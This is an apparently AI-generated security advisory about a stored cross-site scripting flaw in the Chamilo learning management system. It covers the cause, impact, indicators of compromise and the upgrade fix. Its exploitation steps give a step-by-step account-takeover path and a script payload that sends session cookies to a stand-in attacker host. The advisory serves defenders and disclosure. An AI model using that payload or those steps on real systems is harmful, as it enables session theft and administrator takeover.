CVE-2025-59542: 
Chamilo vulnerability analysis and mitigation

Overview

CVE-2025-59542 is a stored cross-site scripting (XSS) vulnerability in Chamilo LMS, a widely used open-source learning management system. An attacker with a low-privileged account (e.g., a trainer) can inject malicious JavaScript into the course learning path Settings field, which then executes in the browser context of any user — including administrators — who views the affected course information page. The vulnerability affects Chamilo LMS versions prior to 1.11.34 (specifically confirmed in v1.11.32) and was disclosed on March 5–6, 2026. It carries a CVSS v3.1 base score of 9.0 (Critical) (GitHub Advisory, Red Hat CVE).

Technical details

The root cause is improper neutralization of user-supplied input in the course learning path Settings field before it is stored and subsequently rendered in web pages (CWE-79: Stored XSS). The affected component is Course Management → Course → Learning Path Settings, where input is not adequately sanitized or encoded before being persisted to the database and reflected back to users. An attacker with trainer-level (low-privilege) access can craft a malicious JavaScript payload and save it in the Settings field; the payload executes automatically in the victim's browser when they navigate to the course information page, requiring no further interaction beyond the page visit. The attack vector is network-based, requires low privileges, and only requires that a victim user view the affected page (GitHub Advisory).

Impact

Successful exploitation enables session cookie or authentication token exfiltration, leading to account takeover (ATO) of higher-privileged users, including administrators. This allows privilege escalation from trainer to admin, granting an attacker full control over the LMS instance — including access to user data, course content, and system configuration. The CVSS score reflects high impacts on confidentiality, integrity, and availability, as a compromised admin account can be leveraged to further compromise the entire platform (GitHub Advisory).

Exploitability

As of the time of disclosure, there is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation (Feedly). The EPSS score is approximately 0.041% (0.000410), indicating a low current probability of exploitation in the wild. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The vulnerability was reported by researcher prakhar0x01 (GitHub Advisory).

Exploitation steps

  1. Gain low-privileged access: Register or obtain credentials for a trainer-level account on a vulnerable Chamilo LMS instance (version ≤ 1.11.32).
  2. Navigate to the vulnerable field: Log in and go to Course Management → select a course → Learning Path → Settings.
  3. Inject malicious payload: Enter a JavaScript payload into the Settings field, such as <script>document.location='https://attacker.com/steal?c='+document.cookie;</script> or an equivalent XSS vector that exfiltrates session cookies to an attacker-controlled server.
  4. Save the settings: Submit/save the form, causing the malicious script to be stored in the database.
  5. Wait for victim interaction: When an administrator or other privileged user views the course information page, the stored script executes automatically in their browser context.
  6. Capture session tokens: The attacker's server receives the victim's session cookie or authentication token.
  7. Perform account takeover: Use the captured session token to authenticate as the victim (e.g., administrator), gaining full administrative access to the LMS (GitHub Advisory).

Indicators of compromise

  • Logs: Web server access logs showing unexpected outbound requests from the Chamilo server or unusual HTTP requests to course learning path settings pages; application logs showing script tags or JavaScript keywords in form submission data for learning path settings fields.
  • Network: Outbound HTTP/HTTPS requests from administrator browsers to unknown or attacker-controlled domains shortly after viewing course information pages; unusual DNS queries from client machines to external domains following LMS page visits.
  • File System: No direct file system artifacts expected for a stored XSS attack, but review the database for unexpected JavaScript content in learning path settings fields.
  • User Activity: Unexpected administrative actions (new user creation, privilege changes, configuration modifications) performed by admin accounts, particularly outside normal working hours or from unfamiliar IP addresses, which may indicate session hijacking (GitHub Advisory).

Mitigation and workarounds

The primary remediation is to upgrade Chamilo LMS to version 1.11.34 or later, which was released as a security-focused update and includes a fix for this vulnerability (GitHub Release). As interim mitigations, administrators should restrict trainer and low-privileged account permissions to prevent modification of course learning path settings, and implement Content Security Policy (CSP) headers to limit JavaScript execution contexts. Monitoring administrative accounts for suspicious activity and auditing learning path settings fields for unexpected script content is also recommended (GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related Chamilo vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-45140CRITICAL9.8
  • PHP logoPHP
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesSep 17, 2026
CVE-2026-39878CRITICAL9.3
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesJul 20, 2026
CVE-2026-45143CRITICAL9
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesSep 17, 2026
CVE-2026-34239HIGH7.5
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoYesJul 20, 2026
CVE-2026-82535MEDIUM5.3
  • Chamilo logoChamilo
  • cpe:2.3:a:chamilo:chamilo_lms
NoNoSep 11, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management